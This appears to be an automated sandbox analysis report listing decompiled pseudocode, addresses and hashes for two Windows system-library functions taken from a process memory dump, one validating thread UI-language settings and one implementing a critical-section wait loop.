                                                                                                                                0x04f12a72
                                                                                                                                0x00000000

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PATH
                                                                                                                                • API String ID: 0-1036084923
                                                                                                                                • Opcode ID: c10d1008d72484a817576acb95a4dd89f9ebd6f9b4f9cffeeaa3ab2ce3e3044b
                                                                                                                                • Instruction ID: 9f7753d7814cb6b6654b92204bf3f845c2ce17bde65695a47b7c2960c15744a2
                                                                                                                                • Opcode Fuzzy Hash: c10d1008d72484a817576acb95a4dd89f9ebd6f9b4f9cffeeaa3ab2ce3e3044b
                                                                                                                                • Instruction Fuzzy Hash: C8C19171E10219EFDB14DFA9D880BAEB7B1FF48754F454069E901BB2A0E734B942DB60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 80%
                                                                                                                                			E04F1FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04EFEEF0(0x4fd7b60);
					_t134 =  *0x4fd7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4fd7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4fd7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04EF6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04EF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04F88938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04EEB150();
													}
													_t116 = E04F86D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04EF75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4fd8638; // 0x3016bd8
																	_t122 = L04EF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04EF76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04EF76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04F1FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04EF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04F1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04F1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04F1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04F1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04F1FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4fd7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4fd7b84 = _t75;
						_t73 = E04EFEB70(_t134, 0x4fd7b60);
						if( *0x4fd7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04EFFF60( *0x4fd7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                                0x04f1fab0
                                                                                                                                0x04f1fab2
                                                                                                                                0x04f1fab3
                                                                                                                                0x04f1fab4
                                                                                                                                0x04f1fabc
                                                                                                                                0x04f1fac0
                                                                                                                                0x04f1fb14
                                                                                                                                0x04f1fb17
                                                                                                                                0x04f1fac2
                                                                                                                                0x04f1fac8
                                                                                                                                0x04f1facd
                                                                                                                                0x04f1fad3
                                                                                                                                0x04f1fad3
                                                                                                                                0x04f1fadd
                                                                                                                                0x04f1fb18
                                                                                                                                0x04f1fb1b
                                                                                                                                0x04f1fb1d
                                                                                                                                0x04f1fb1e
                                                                                                                                0x04f1fb1f
                                                                                                                                0x04f1fb20
                                                                                                                                0x04f1fb21
                                                                                                                                0x04f1fb22
                                                                                                                                0x04f1fb23
                                                                                                                                0x04f1fb24
                                                                                                                                0x04f1fb25
                                                                                                                                0x04f1fb26
                                                                                                                                0x04f1fb27
                                                                                                                                0x04f1fb28
                                                                                                                                0x04f1fb29
                                                                                                                                0x04f1fb2a
                                                                                                                                0x04f1fb2b
                                                                                                                                0x04f1fb2c
                                                                                                                                0x04f1fb2d
                                                                                                                                0x04f1fb2e
                                                                                                                                0x04f1fb2f
                                                                                                                                0x04f1fb3a
                                                                                                                                0x04f1fb3b
                                                                                                                                0x04f1fb3e
                                                                                                                                0x04f1fb41
                                                                                                                                0x04f1fb44
                                                                                                                                0x04f1fb47
                                                                                                                                0x04f1fb4a
                                                                                                                                0x04f1fb4d
                                                                                                                                0x04f1fb53
                                                                                                                                0x04f5bdcb
                                                                                                                                0x04f5bdcb
                                                                                                                                0x04f1fb59
                                                                                                                                0x04f1fb5b
                                                                                                                                0x04f1fb5b
                                                                                                                                0x04f1fb5e
                                                                                                                                0x04f5bdd5
                                                                                                                                0x04f5bdd8
                                                                                                                                0x00000000
                                                                                                                                0x04f5bdda
                                                                                                                                0x00000000
                                                                                                                                0x04f5bdda
                                                                                                                                0x04f1fb64
                                                                                                                                0x04f1fb64
                                                                                                                                0x04f1fb64
                                                                                                                                0x04f1fb67
                                                                                                                                0x04f1fb6e
                                                                                                                                0x04f1fb70
                                                                                                                                0x04f1fb72
                                                                                                                                0x00000000
                                                                                                                                0x04f1fb78
                                                                                                                                0x04f1fb7a
                                                                                                                                0x04f1fb7a
                                                                                                                                0x04f1fb7d
                                                                                                                                0x04f1fb80
                                                                                                                                0x04f5bddf
                                                                                                                                0x04f5bde1
                                                                                                                                0x00000000
                                                                                                                                0x04f5bde3
                                                                                                                                0x00000000
                                                                                                                                0x04f5bde3
                                                                                                                                0x04f1fb86
                                                                                                                                0x04f1fb86
                                                                                                                                0x04f1fb86
                                                                                                                                0x04f1fb8b
                                                                                                                                0x04f1fb90
                                                                                                                                0x04f1fb92
                                                                                                                                0x04f1fb94
                                                                                                                                0x04f1fb9a
                                                                                                                                0x04f1fb9b
                                                                                                                                0x04f1fba1
                                                                                                                                0x04f5bde8
                                                                                                                                0x04f5bdeb
                                                                                                                                0x04f5bded
                                                                                                                                0x04f5beb5
                                                                                                                                0x04f5beb5
                                                                                                                                0x04f5bebb
                                                                                                                                0x04f5bebd
                                                                                                                                0x04f5bec3
                                                                                                                                0x04f5bed2
                                                                                                                                0x04f5bedd
                                                                                                                                0x04f5bedd
                                                                                                                                0x04f5beed
                                                                                                                                0x00000000
                                                                                                                                0x04f5bdf3
                                                                                                                                0x04f5bdfe
                                                                                                                                0x04f5be06
                                                                                                                                0x04f5be0b
                                                                                                                                0x04f5be0d
                                                                                                                                0x04f5be0f
                                                                                                                                0x04f5be14
                                                                                                                                0x04f5be19
                                                                                                                                0x04f5be20
                                                                                                                                0x04f5be25
                                                                                                                                0x04f5be27
                                                                                                                                0x04f5be35
                                                                                                                                0x04f5be39
                                                                                                                                0x04f5be46
                                                                                                                                0x04f5be4f
                                                                                                                                0x04f5be54
                                                                                                                                0x04f5be56
                                                                                                                                0x04f5bef8
                                                                                                                                0x04f5bef8
                                                                                                                                0x00000000
                                                                                                                                0x04f5be5c
                                                                                                                                0x04f5be5c
                                                                                                                                0x04f5be60
                                                                                                                                0x00000000
                                                                                                                                0x04f5be66
                                                                                                                                0x04f5be66
                                                                                                                                0x04f5be7f
                                                                                                                                0x04f5be84
                                                                                                                                0x04f5be87
                                                                                                                                0x04f5be89
                                                                                                                                0x04f5be8b
                                                                                                                                0x04f5be99
                                                                                                                                0x04f5be9d
                                                                                                                                0x04f5bea0
                                                                                                                                0x04f5beac
                                                                                                                                0x04f5beaf
                                                                                                                                0x04f5beb1
                                                                                                                                0x04f5beb3
                                                                                                                                0x04f5beb3
                                                                                                                                0x00000000
                                                                                                                                0x04f5bea2
                                                                                                                                0x04f5bea2
                                                                                                                                0x00000000
                                                                                                                                0x04f5bea2
                                                                                                                                0x04f5be8d
                                                                                                                                0x04f5be8d
                                                                                                                                0x04f5be92
                                                                                                                                0x00000000
                                                                                                                                0x04f5be92
                                                                                                                                0x04f5be8b
                                                                                                                                0x04f5be60
                                                                                                                                0x04f5be3b
                                                                                                                                0x04f5be3b
                                                                                                                                0x04f5be3e
                                                                                                                                0x00000000
                                                                                                                                0x04f5be40
                                                                                                                                0x04f5be40
                                                                                                                                0x04f5be44
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5be44
                                                                                                                                0x04f5be3e
                                                                                                                                0x04f5be29
                                                                                                                                0x04f5be29
                                                                                                                                0x00000000
                                                                                                                                0x04f5be29
                                                                                                                                0x04f5be27
                                                                                                                                0x00000000
                                                                                                                                0x04f1fba7
                                                                                                                                0x04f1fba7
                                                                                                                                0x04f1fbab
                                                                                                                                0x04f5bf02
                                                                                                                                0x04f1fbb1
                                                                                                                                0x04f1fbb1
                                                                                                                                0x04f1fbb8
                                                                                                                                0x04f1fbbd
                                                                                                                                0x04f1fbbd
                                                                                                                                0x04f1fbbf
                                                                                                                                0x04f1fbbf
                                                                                                                                0x04f1fbc5
                                                                                                                                0x04f1fbcb
                                                                                                                                0x04f1fbf8
                                                                                                                                0x04f1fbf8
                                                                                                                                0x04f1fbfa
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc00
                                                                                                                                0x04f1fc00
                                                                                                                                0x04f1fc03
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc09
                                                                                                                                0x04f1fc09
                                                                                                                                0x04f1fc0f
                                                                                                                                0x04f1fc15
                                                                                                                                0x04f1fc23
                                                                                                                                0x04f1fc23
                                                                                                                                0x04f1fc25
                                                                                                                                0x04f1fc27
                                                                                                                                0x04f1fc75
                                                                                                                                0x04f1fc7c
                                                                                                                                0x04f1fc84
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc29
                                                                                                                                0x04f1fc29
                                                                                                                                0x04f1fc2d
                                                                                                                                0x04f1fc30
                                                                                                                                0x04f5bf0f
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc36
                                                                                                                                0x04f1fc38
                                                                                                                                0x04f1fc3b
                                                                                                                                0x04f1fc41
                                                                                                                                0x04f5bf17
                                                                                                                                0x04f5bf19
                                                                                                                                0x04f5bf48
                                                                                                                                0x04f5bf4b
                                                                                                                                0x00000000
                                                                                                                                0x04f5bf1b
                                                                                                                                0x04f5bf22
                                                                                                                                0x04f5bf24
                                                                                                                                0x04f5bf26
                                                                                                                                0x00000000
                                                                                                                                0x04f5bf2c
                                                                                                                                0x04f5bf37
                                                                                                                                0x04f5bf39
                                                                                                                                0x04f5bf3b
                                                                                                                                0x00000000
                                                                                                                                0x04f5bf41
                                                                                                                                0x04f5bf41
                                                                                                                                0x04f5bf41
                                                                                                                                0x04f5bf41
                                                                                                                                0x04f5bf45
                                                                                                                                0x00000000
                                                                                                                                0x04f5bf45
                                                                                                                                0x04f5bf3b
                                                                                                                                0x04f5bf26
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc47
                                                                                                                                0x04f1fc47
                                                                                                                                0x04f1fc49
                                                                                                                                0x04f1fcb2
                                                                                                                                0x04f1fcb4
                                                                                                                                0x04f1fcb6
                                                                                                                                0x04f1fcdc
                                                                                                                                0x04f1fcdc
                                                                                                                                0x00000000
                                                                                                                                0x04f1fcb8
                                                                                                                                0x04f1fcc3
                                                                                                                                0x04f1fcc5
                                                                                                                                0x04f1fcc7
                                                                                                                                0x00000000
                                                                                                                                0x04f1fcc9
                                                                                                                                0x04f1fcc9
                                                                                                                                0x04f1fccd
                                                                                                                                0x00000000
                                                                                                                                0x04f1fccd
                                                                                                                                0x04f1fcc7
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc4b
                                                                                                                                0x04f1fc4b
                                                                                                                                0x04f1fc4e
                                                                                                                                0x04f1fc4e
                                                                                                                                0x04f1fc51
                                                                                                                                0x04f1fc51
                                                                                                                                0x04f1fc54
                                                                                                                                0x04f1fc5a
                                                                                                                                0x04f1fc5c
                                                                                                                                0x04f1fc5f
                                                                                                                                0x04f1fc61
                                                                                                                                0x04f1fc63
                                                                                                                                0x04f1fc65
                                                                                                                                0x04f1fc67
                                                                                                                                0x04f1fc6e
                                                                                                                                0x04f1fc72
                                                                                                                                0x04f1fc72
                                                                                                                                0x04f1fc72
                                                                                                                                0x04f1fc72
                                                                                                                                0x04f1fc67
                                                                                                                                0x04f1fc61
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc5a
                                                                                                                                0x04f1fc49
                                                                                                                                0x04f1fc41
                                                                                                                                0x04f1fc30
                                                                                                                                0x04f1fc27
                                                                                                                                0x04f1fc03
                                                                                                                                0x04f1fbcd
                                                                                                                                0x04f1fbd3
                                                                                                                                0x04f1fbd9
                                                                                                                                0x04f1fbdc
                                                                                                                                0x04f1fbde
                                                                                                                                0x04f1fc99
                                                                                                                                0x04f1fc9b
                                                                                                                                0x04f1fc9d
                                                                                                                                0x04f1fcd5
                                                                                                                                0x04f1fcd5
                                                                                                                                0x04f1fc89
                                                                                                                                0x04f1fc89
                                                                                                                                0x00000000
                                                                                                                                0x04f1fc9f
                                                                                                                                0x04f1fc9f
                                                                                                                                0x04f1fca3
                                                                                                                                0x00000000
                                                                                                                                0x04f1fca3
                                                                                                                                0x00000000
                                                                                                                                0x04f1fbe4
                                                                                                                                0x04f1fbe4
                                                                                                                                0x04f1fbe4
                                                                                                                                0x04f1fbe4
                                                                                                                                0x04f1fbe9
                                                                                                                                0x04f1fbf2
                                                                                                                                0x00000000
                                                                                                                                0x04f1fbf2
                                                                                                                                0x04f1fbde
                                                                                                                                0x04f1fbcb
                                                                                                                                0x04f1fbab
                                                                                                                                0x04f1fc8b
                                                                                                                                0x04f1fc8b
                                                                                                                                0x04f1fc8c
                                                                                                                                0x04f1fb80
                                                                                                                                0x04f1fb72
                                                                                                                                0x04f1fb5e
                                                                                                                                0x04f1fc8d
                                                                                                                                0x04f1fc91
                                                                                                                                0x04f1fadf
                                                                                                                                0x04f1fadf
                                                                                                                                0x04f1fae1
                                                                                                                                0x04f1fae4
                                                                                                                                0x04f1fae7
                                                                                                                                0x04f1faec
                                                                                                                                0x04f1faf8
                                                                                                                                0x04f1fb00
                                                                                                                                0x04f1fb07
                                                                                                                                0x04f1fb0f
                                                                                                                                0x04f1fb0f
                                                                                                                                0x04f1fb07
                                                                                                                                0x00000000
                                                                                                                                0x04f1faf8
                                                                                                                                0x04f1fadd

                                                                                                                                Strings
                                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04F5BE0F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                                • API String ID: 0-865735534
                                                                                                                                • Opcode ID: 3e16f55319970e1585c6a92b05cabffb8531530491cc70f365baa37bb33fe742
                                                                                                                                • Instruction ID: 0b5ed18cc8e99297ece4e5069c41c49993c867767add8dbf99cf939ef5de0e2a
                                                                                                                                • Opcode Fuzzy Hash: 3e16f55319970e1585c6a92b05cabffb8531530491cc70f365baa37bb33fe742
                                                                                                                                • Instruction Fuzzy Hash: 79A10432F006468FEB25DF69C850B7AB3A5AF44714F044569DD06DB6A0EB34F9039BA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 63%
                                                                                                                                			E04EE2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4fd5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4fd7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04F297C0();
				}
				if( *0x4fd79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4fd79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04F11624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04F07D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04F7FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04F29520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04F1E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04F3DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4fd6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4fd6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04F29980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04F295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04F07D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04F07D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04F67016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04F7FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4fd5350;
							if(_t109 != 0x4fd5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04F7FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04F75720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                                0x04ee2d8a
                                                                                                                                0x04ee2d8a
                                                                                                                                0x04ee2d92
                                                                                                                                0x04ee2d96
                                                                                                                                0x04ee2d9e
                                                                                                                                0x04ee2da0
                                                                                                                                0x04ee2da3
                                                                                                                                0x04ee2da5
                                                                                                                                0x04ee2da8
                                                                                                                                0x04ee2dab
                                                                                                                                0x04ee2db2
                                                                                                                                0x04f3f9aa
                                                                                                                                0x04f3f9ab
                                                                                                                                0x04f3f9ae
                                                                                                                                0x04f3f9ae
                                                                                                                                0x04ee2db8
                                                                                                                                0x04ee2dc2
                                                                                                                                0x04f3f9b9
                                                                                                                                0x04f3f9be
                                                                                                                                0x04f3f9bf
                                                                                                                                0x04f3f9bf
                                                                                                                                0x04ee2dcf
                                                                                                                                0x04f3f9c9
                                                                                                                                0x04ee2dd5
                                                                                                                                0x04ee2dd5
                                                                                                                                0x04ee2dd5
                                                                                                                                0x04ee2dde
